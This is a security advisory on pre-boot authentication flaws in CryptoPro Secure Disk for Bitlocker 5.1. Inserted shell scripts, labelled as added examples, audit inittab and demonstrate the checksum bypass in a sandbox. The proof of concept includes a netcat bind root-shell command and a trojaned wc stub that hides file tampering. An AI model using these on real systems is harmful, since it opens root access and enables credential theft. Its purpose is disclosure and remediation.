CryptWare CryptoPro Secure Disk For Bitlocker 5.1.0.6474 Manipulation

Posted Aug 31, 2016
Authored by Rene Freingruber, M. von Dach | Site sec-consult.com

CryptWare CryptoPro Secure Disk for Bitlocker version 5.1.0.6474 suffers from flaws that allow a malicious party to attack the boot process and backdoor the system to steal login credentials, the private 802.1x certificate, and the associated password.

tags | exploit
SHA-256 | f6c2bdd62d1577463dc9c79bb653feed9235e44736641fa6d88a9f5d0e6c8af7

SEC Consult Vulnerability Lab Security Advisory < 20160831-0 >
=======================================================================
title: Manipulation of pre-boot authentication
product: CryptWare CryptoPro Secure Disk for Bitlocker
vulnerable version: 5.1.0.6474
fixed version: 5.2.1
CVE number: -
impact: critical
homepage: http://www.cryptware.eu
found: 2016-06-30
by: R. Freingruber (Office Vienna)
M. von Dach (Office Zurich)
SEC Consult Vulnerability Lab

An integrated part of SEC Consult
Bangkok - Berlin - Linz - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich

https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"CryptoPro Secure Disk for BitLocker enhances the functionality of
Microsoft BitLocker to have its own PreBoot Authentication (PBA)
and enables BitLocker to use established and existing authentication
methods like UID/Password and Smartcard/PIN. The encryption
of the hard disk, as well as the recovery mechanism, are realized with
Microsoft BitLocker, while the user authentication and help-desk
mechanism are handled by CryptoPro Secure Disk for Bitlocker.

This ideal combination of both technologies allows customers to
establish an easy-to-use and cost-effective solution, even without
having to use TPM authentication and administration. Our centralized
encryption management with different roles of administration and
multi-client capability delivers new opportunities for customers and
third party service providers."

Source:
http://files.cryptware.eu/200000369-9fec6a1e00/CryptWare_Datenblatt_Secure_Disk_for_BitLocker_EN.pdf


Business recommendation:
------------------------
By using the vulnerabilities documented in this advisory an attacker
can attack the boot process and backdoor the system to steal
login credentials, the private 802.1x certificate and the associated
password.

SEC Consult recommends not to use this software until a thorough security
review has been performed by security professionals and all identified
issues have been resolved.


Vulnerability overview/description:
-----------------------------------
1) Terminal access not blocked at login mask
Installing CryptoPro Secure Disk adds an additional ext3 partition to the
system. This partition contains a small Linux operating system that is
started directly after booting, before any BitLocker code runs. An init
script then starts the login application.
An attacker can use a keyboard shortcut to switch to the first virtual
terminal. This gives the attacker an invisible root shell: commands are
executed, but their output is not directly visible.
The other terminals (two to six) are blocked via entries in the
/etc/inittab file. The corresponding entry for terminal one is not
active (it is commented out), so terminal one remains reachable.


2) Inadequate software manipulation verification
After the system starts, the following application is launched:
/usr/SUPERSHEEP/bin/app_launcher -a ./ss_gui
The app_launcher application carries out checks and finally starts the
graphical user interface with the login mask (ss_gui).
These checks first verify the hash of the file
/usr/SUPERSHEEP/bin/verify_checksums.sh
and then execute the script. The script calculates the hash of nearly
every file on the system and compares it with a preconfigured list
(which is stored inside an encrypted block special file).
If the hash of the script is wrong, or the script reports invalid hashes,
the boot process is stopped and an error is displayed to the user.
The script contains a design / logic error which allows an attacker to
bypass the hash verification. By exploiting this flaw an attacker can
modify any file on the system (e.g. add a backdoor) without the
verification noticing.


Proof of concept:
-----------------
1) Terminal access not blocked at login mask
An attacker can use the keyboard shortcut Ctrl+Alt+F1 to open an
invisible root shell. A simple proof-of-concept is to type the command
"reboot" blind. This results in a beep and a reboot of the system.
Another proof-of-concept is to connect the victim system to a network
with a DHCP server, so that it is assigned an IP address, and then start
the following command:
/usr/bin/netcat -lvvp 8197 -e /bin/sh

Because nothing is echoed, the command must be typed blind using a
German keyboard layout (the layout in use in the pre-boot environment
of the tested system). It binds a root shell to port 8197. Afterwards
the attacker can connect to port 8197 to issue commands and receive
their output.
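As an added check (not from the advisory or the vendor), the following POSIX shell script audits a sysvinit-style inittab for virtual consoles that still have a process respawned on them, which is what leaves Ctrl+Alt+F1 answering in finding 1. Both inittab files it writes are constructed for the demonstration: the advisory does not reproduce the product's real /etc/inittab, and the /bin/sh entry on tty1 is an assumption about how such a root shell is wired up.

```shell
#!/bin/sh
# Added example, not part of the advisory or the product.  Audits a
# sysvinit-style inittab for virtual consoles that still get a process
# respawned on them (the condition that leaves Ctrl+Alt+F1 usable in
# finding 1).  The two inittab files below are constructed for the
# demonstration; the /bin/sh entry on tty1 is an assumption.
set -u

# Print "ttyN: <command>" for every uncommented respawn entry whose
# process field names a virtual console.  $1 = path of the inittab.
active_consoles() {
    sed -e 's/[[:space:]]*#.*$//' "$1" |
    awk -F: '$3 == "respawn" && match($4, /tty[0-9]+/) {
                 print substr($4, RSTART, RLENGTH) ": " $4 }'
}

# Constructed inittab mirroring the advisory's description: consoles two
# to six are commented out, console one is still active.
write_weak_inittab() {
    cat > "$1" <<'EOF'
id:2:initdefault:
si::sysinit:/etc/init.d/rcS
# console 1 still spawns a root shell (reachable with Ctrl+Alt+F1)
1:2345:respawn:/bin/sh </dev/tty1 >/dev/tty1 2>&1
# consoles 2-6 disabled
#2:2345:respawn:/sbin/getty 38400 tty2
#3:2345:respawn:/sbin/getty 38400 tty3
#4:2345:respawn:/sbin/getty 38400 tty4
#5:2345:respawn:/sbin/getty 38400 tty5
#6:2345:respawn:/sbin/getty 38400 tty6
l0:0:wait:/etc/init.d/rc 0
EOF
}

# Same file with every console entry removed: nothing answers a VT switch.
write_hardened_inittab() {
    cat > "$1" <<'EOF'
id:2:initdefault:
si::sysinit:/etc/init.d/rcS
l0:0:wait:/etc/init.d/rc 0
EOF
}

# Stand-alone run: audit both constructed files.
weak=$(mktemp); write_weak_inittab "$weak"
hard=$(mktemp); write_hardened_inittab "$hard"
echo "weak inittab:";     active_consoles "$weak"
echo "hardened inittab:"; active_consoles "$hard"   # prints nothing
rm -f "$weak" "$hard"
```

Run active_consoles against the etc/inittab of the product's ext3 partition, mounted read-only from another system; every line it prints is a console that a VT switch will hand to whatever process is listed there. Removing the entry stops a shell from being spawned on that console, but it does not by itself stop the kernel from switching virtual consoles, so the console switch should be locked down at the kernel/VT level as well.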


2) Inadequate software manipulation verification
The script /usr/SUPERSHEEP/bin/verify_checksums.sh executes the following
command to check the hashes of the listed files:
/tmp/sha256sum -c $CS_FILE > $CS_FILE.out
Later the wc (word count) utility is used to count the number of files
with invalid hashes. This is done by the following code:
NUM_FAILED=`wc -l $CS_FILE.error | cut -d " " -f 1`
The script relies on wc being unmodified and on its output being correct.
However, an attacker can replace wc with a program that always reports
zero, which means that zero errors were found.
The problem is circular: verify_checksums.sh does verify the hash of the
wc utility, but it uses that very utility to count the verification
failures, so a manipulated wc hides its own hash mismatch together with
every other one.

For the proof-of-concept the wc file was replaced with the following
content:
#!/bin/sh
echo a0 xa
exit 0

After that, all scripts and binaries on the system can be modified
without the verification failing. For example, the following CryptoPro
Secure Disk script can be backdoored so that the system saves the
private 802.1x keys together with the associated password:
/usr/SUPERSHEEP/extract_certificates.sh
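To make the circularity concrete, the following POSIX shell script is an added example, not the product's verify_checksums.sh: it rebuilds the advisory's failure-counting logic in a throwaway directory, replaces wc with a stub the way the PoC does, and contrasts it with a check that trusts only the checker's exit status and shell builtins. It assumes a SHA-256 checker on PATH (sha256sum from coreutils, or shasum), whereas the product uses a verified copy at /tmp/sha256sum; the file names inside the sandbox are constructed for the demonstration.

```shell
#!/bin/sh
# Added example; this is not the product's verify_checksums.sh.  It rebuilds
# the advisory's failure-counting logic in a temporary directory, shows the
# bypass (a replaced `wc` that always reports zero failures) and a variant
# that does not let an unverified external binary decide the outcome.
# Assumptions: sha256sum (coreutils) or shasum on PATH, POSIX sh.  In the
# product the checker is a verified copy at /tmp/sha256sum.
set -u

sha256() {
    if command -v sha256sum >/dev/null 2>&1; then sha256sum "$@"
    else shasum -a 256 "$@"; fi
}

# Sandbox: bin/wc stands in for /usr/bin/wc (initially a wrapper around the
# real one), bin/ss_gui for any other protected file, checksums.txt for the
# preconfigured hash list.  Prints the directory.
setup_sandbox() {
    sb=$(mktemp -d)
    mkdir -p "$sb/bin"
    printf '#!/bin/sh\nexec "%s" "$@"\n' "$(command -v wc)" > "$sb/bin/wc"
    chmod +x "$sb/bin/wc"
    printf 'login mask\n' > "$sb/bin/ss_gui"
    ( cd "$sb" && sha256 bin/wc bin/ss_gui > checksums.txt )
    echo "$sb"
}

# Mirrors the advisory: the number of FAILED lines is produced by the very
# `wc` that is on the list being checked.  Returns 0 when it counts zero.
# (sed only strips BSD wc's leading padding; the advisory pipes to cut.)
vulnerable_verify() {
    sb=$1
    ( cd "$sb" || exit 1
      sha256 -c checksums.txt > checksums.out 2>/dev/null || :
      grep 'FAILED' checksums.out > checksums.error || :
      n=$("$sb/bin/wc" -l checksums.error | sed 's/^ *//' | cut -d " " -f 1)
      [ "$n" = "0" ] )
}

# Hardened variant: trusts only the checker's own exit status plus a count
# done with shell builtins, so no unverified helper (wc, cut, grep) gets a
# vote on the result.  Returns 0 only when every listed file matched.
hardened_verify() {
    sb=$1
    ( cd "$sb" || exit 1
      sha256 -c checksums.txt > checksums.out 2>/dev/null || exit 1
      n=0
      while IFS= read -r line; do
          case $line in *": FAILED"*) n=$((n + 1)) ;; esac
      done < checksums.out
      [ "$n" -eq 0 ] )
}

# The attacker's move from the advisory: swap wc for a stub that always
# reports zero lines.
trojan_wc() {
    printf '#!/bin/sh\necho 0 checksums.error\nexit 0\n' > "$1/bin/wc"
    chmod +x "$1/bin/wc"
}

# Stand-alone run: clean system, then the same system with wc replaced.
demo() {
    sb=$(setup_sandbox)
    vulnerable_verify "$sb" && echo "clean   : vulnerable check passes"
    hardened_verify   "$sb" && echo "clean   : hardened check passes"
    trojan_wc "$sb"
    vulnerable_verify "$sb" && echo "trojaned: vulnerable check STILL passes (bypass)"
    hardened_verify   "$sb" || echo "trojaned: hardened check fails as it should"
    rm -rf "$sb"
}
demo
```

The hardened variant only narrows the trusted computing base to the shell, the checker binary and the hash list, all of which live on the same pre-boot partition as the script itself. An attacker who already has the root shell from finding 1 can edit any of them, so a hash self-check inside the PBA environment cannot substitute for a boot chain verified from outside it (firmware-verified signatures or TPM measurement), which the vendor description positions the product as not requiring.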


Vulnerable / tested versions:
-----------------------------
Version 5.1.0.6474 was found to be vulnerable; it was the latest version
at the time of discovery.


Vendor contact timeline:
------------------------
2016-08-01: Contacting vendor through support@cryptware.eu
2016-08-02: CryptWare was able to reproduce the vulnerabilities
2016-08-10: Release of CryptoPro Secure Disk 5.2.1 which
according to the vendor fixes the vulnerabilities.
2016-08-31: Coordinated release of security advisory


Solution:
---------
Upgrade to CryptoPro Secure Disk 5.2.1. The patch is provided
by the vendor directly.


Workaround:
-----------
None


Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Bangkok - Berlin - Linz - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF R. Freingruber / @2016
